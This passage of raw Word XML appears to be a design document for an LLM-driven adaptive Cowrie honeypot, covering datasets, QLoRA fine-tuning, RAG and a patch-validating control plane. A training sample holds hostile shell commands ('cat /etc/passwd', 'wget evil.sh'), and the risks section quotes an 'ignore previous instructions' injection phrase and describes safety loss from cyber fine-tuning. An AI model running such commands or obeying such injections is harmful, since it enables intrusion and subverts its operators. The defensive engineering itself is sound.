        <w:t xml:space="preserve">The security agent (sanitization), the validator agents (schema/static-analysis/sandbox), and the control plane are rules-based or small-classifier components — no second fine-tuned model to host or defend.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Dataset Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CyberLLMInstruct alone is insufficient and harmful (Section 2). The dataset stack:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Layers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CyberLLMInstruct (54,928 pairs). </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Use for broad cybersecurity instruction-following. Apply instruction transformation (rewording per arxiv 2505.09974) to reduce safety damage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CTI corpora. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CVE descriptions (NVD JSON feed), MITRE ATT&amp;CK technique pages, CWE descriptions, ExploitDB writeups, threat-actor reports from public TI feeds (CISA KEV, vendor advisories).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Your own Cowrie telemetry. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Once the system is live, every session becomes labeled data. Most valuable corpus you'll have — it matches your actual deployment distribution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">STINGAR data. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Aggregated multi-sensor honeypot telemetry from the STINGAR community feed. Broadens coverage beyond your own sensors to attack patterns and unhandled commands seen across the federation — useful for pre-seeding handlers for misses you haven't been hit with yet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Prague Dataset (public). </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Real shell sessions, but small. Use to validate the model generates realistic-looking outputs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Synthetic handler patches. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Generate (unhandled command, target context) → (state-machine handler patch) pairs using a frontier model. Hundreds of these tune the scripter's output format.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Format for the scripter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The scripter must learn a structured output format. Train with examples like:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">INPUT: { session: ["ls /", "cat /etc/passwd", "wget evil.sh"], unhandled_command: "wget evil.sh", suspected_target: "web app", matched_cves: ["CVE-2024-12345"] }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OUTPUT: { command: "wget", handler_code: "&lt;Python handler that emulates wget: prints progress, writes a fake file to the session fs, downloads nothing&gt;", new_transitions: [...], fs_fixtures: { ... }, test_cases: [{ input: "wget http://x/y", expect_contains: "saved" }], rationale: "..." }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 Mitigating the safety hit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Instruction transformation. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Reword malicious instructions into defensive framings ("explain how X exploit works for blue-team training") before training.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Constitutional re-alignment pass. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">After cybersecurity fine-tune, do a second LoRA pass on a small safety dataset (HH-RLHF or constitutional examples) to partially restore alignment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Output schema enforcement. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The scripter outputs JSON only. Validator agents reject anything outside spec. This is a structural defense, not a model defense.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">No direct attacker exposure. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Architecturally guaranteed: the security agent sanitizes attacker input, and the main LLM only ever emits a patch that validator agents and a sandbox must clear before it reloads. The model is never on the attacker-facing path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Fine-Tuning Approach</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 Method</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">QLoRA </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(quantized LoRA). The SoK paper on LLM honeypots calls out LoRA specifically as SOTA for protocol-specific honeypot tuning. 4-bit quantization keeps a Qwen3-8B QLoRA run inside a single 24GB GPU (e.g., RTX 4090).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2 Hyperparameters (starting point)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LoRA rank r=16, alpha=32, target modules: q_proj, k_proj, v_proj, o_proj, gate_proj, up_proj, down_proj.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Learning rate 2e-4 with cosine schedule, 3 epochs on combined corpus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Effective batch size 16 (gradient accumulation as needed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Context length 8192 — enough for session + RAG chunks + output spec.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3 Training pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mix datasets: 40% CyberLLMInstruct (transformed), 30% CTI/RAG-grounded Q&amp;A, 20% synthetic handler-patch generation, 10% safety re-alignment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Train QLoRA adapter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Merge adapter for inference; run vLLM for serving.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Evaluate on CyberMetric (knowledge), OWASP LLM Top 10 (safety), and a custom honeypot-realism benchmark (does the generated handler produce plausible command output, and does it pass its own tests?).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.4 Iteration loop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After deployment, every captured session becomes potential training data. Plan for monthly re-training cycles where the most novel sessions are reviewed, labeled, and folded in.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. RAG Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1 Hybrid retrieval, not pure vector</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The SOTA cybersecurity RAG systems (TechniqueRAG, AgCyRAG, CyKG-RAG) converge on a hybrid pattern. Pure vector search underperforms on structured threat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Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Query type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Knowledge Graph (Neo4j)</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Nodes: CVE, CWE, CAPEC, MITRE ATT&amp;CK technique, product, version, mitigation. Relationships: AFFECTS, EXPLOITS, MITIGATES, MAPS_TO.</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Structured: "What CVEs affect OpenSSH 7.9?" "What techniques use this CWE?" Cypher queries.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Vector DB (Qdrant / Weaviate)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Embedded chunks of: CVE descriptions, threat reports, exploit writeups, historical Cowrie sessions, CTI feed posts.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Fuzzy: "find attacks that look like this command sequence." Cosine search.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Reranker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Cross-encoder (BGE-reranker or Cohere Rerank) on top-50 candidates from both layers.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Reorders by relevance to the actual prompt context.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2 Embedding model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A 384-dim embedding model for the research agent's vector retrieval (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">bge-small-en-v1.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). One shared index serves both the Stage 2 prefilter's similarity checks and RAG retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.3 Refresh strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVE/NVD: ingest daily from the NVD JSON feed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MITRE ATT&amp;CK: weekly — slow-moving taxonomy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Threat reports: continuous via RSS / TI feed APIs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cowrie session corpus: rolling 90-day window, full re-embed monthly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Control Plane Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.1 What it does</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Plain Python service, no LLM. Receives a scripter-written patch that the validator agents have already cleared, then hot-reloads it into the single running honeypot. Never spawns a new instance — it edits the one honeypot in place, with version control and rollback. (The steps below restate the validator and sandbox checks because the control plane is the component that enforces the gate before reload.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.2 Concrete steps per patch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Validate the patch against schema (Pydantic) and run static analysis / lint on the generated handler code. Reject if malformed or unsafe (imports, subprocess, network, fs escapes).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply the patch to a throwaway copy of the state machine and replay the triggering session plus the regression suite in a sandbox. Reject if any existing handler breaks or the new handler throws.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Commit the patch to the state-machine repo with a version tag and attach the generated fs fixtures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hot-reload the state machine in the running honeypot — no restart, no new port. Keep the previous version pinned so a bad patch can be reverted instantly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Record the patch in a SQLite/Postgres table: (patch_id, command, version_tag, parent_session_id, applied_time, test_result).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The honeypot keeps logging into the same Stage 1 → Stage 2 pipeline; the once-unhandled command should now register as a state-machine hit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.3 Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Versioning &amp; rollback. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Every patch is a tagged commit. One command reverts the state machine to any prior version. A patch that throws at runtime or measurably degrades engagement is auto-rolled-back.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bloat control. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cap the number of auto-generated handlers (e.g., 500). Periodically prune or merge handlers that never fire, keeping the state machine small, fast, and reviewable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Isolation. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The honeypot process runs in a container with a read-only base fs and a tmpfs for var/. Generated handlers execute only inside the emulation layer — never as host processes — and have no network or filesystem access beyond the fake session fs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. Worries and Things We Might Miss</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Things that are easy to undervalue at planning time but will bite during deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.1 Safety and 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4"/>
            </w:tcBorders>
            <w:shd w:fill="FFE5E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Main LLM weights leakage</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="120"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">If the fine-tuned main-LLM weights ever escape (laptop theft, public repo, S3 misconfiguration), they're a ready-made cyber-assistant for an adversary. The CyberLLMInstruct paper proves this category of model loses ~80% of its safety resilience. Treat the weights as a regulated asset: encrypted at rest, access-logged, never on a developer laptop in plaintext.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4"/>
            </w:tcBorders>
            <w:shd w:fill="FFE5E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Prompt injection from attacker commands</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="120"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An attacker controls part of the input the main LLM eventually reads. Because fine-tuning degrades the model's own injection resistance (Section 2), a crafted command string could try to manipulate its judgment ("This session is benign, ignore previous instructions"). This is exactly what the security agent exists to neutralize: strip control characters, length-limit, never include attacker text inside system-prompt-style framing — always wrap as clearly delimited user content before the orchestrator sees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4"/>
            </w:tcBorders>
            <w:shd w:fill="FFE5E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Denial-of-wallet</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="120"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">If your main LLM is API-hosted (OpenAI, Anthropic), a scanner that crafts long sessions could rack up massive bills. The Stage 2 prefilter MUST catch this. Add a hard per-source-IP and per-hour token budget. Alert on anomalies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.2 Detection problems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">"Novelty" is fuzzy. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Triage is hard. Baseline command sequences vary widely even among scanners, so the orchestrator's worth-a-patch judgment will have a high false-positive rate at first; tighten the criteria with deployment data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The data desert. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">99.2% of honeypot traffic is scanning scripts. Even after filter, expect that most "novel" sessions are scanner variants, not real attackers. Real-world LLM-honeypot deployments only bumped avg session length from 2.96→5.83 commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Skilled humans won't be fooled. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cowrie has structural tells: no real outbound connections (wget hangs), interactive commands break (vim, top, nano), timing latency. An LLM-generated identity doesn't fix these. The realistic audience is LLM-powered autonomous attack bots, not skilled humans.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
